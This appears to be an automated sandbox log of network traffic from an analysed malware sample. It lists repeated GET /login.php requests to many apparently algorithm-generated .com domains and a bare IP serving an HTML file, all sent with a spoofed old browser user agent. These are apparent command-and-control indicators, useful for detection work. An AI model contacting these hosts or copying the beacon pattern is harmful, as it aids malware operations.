    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0433-1952-8ae5-52e851fd8a3a HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731346399.2937263
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731346399.2937263
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0433-4491-9018-901015a08e06 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731346399.2937263; parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478891988923922560
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
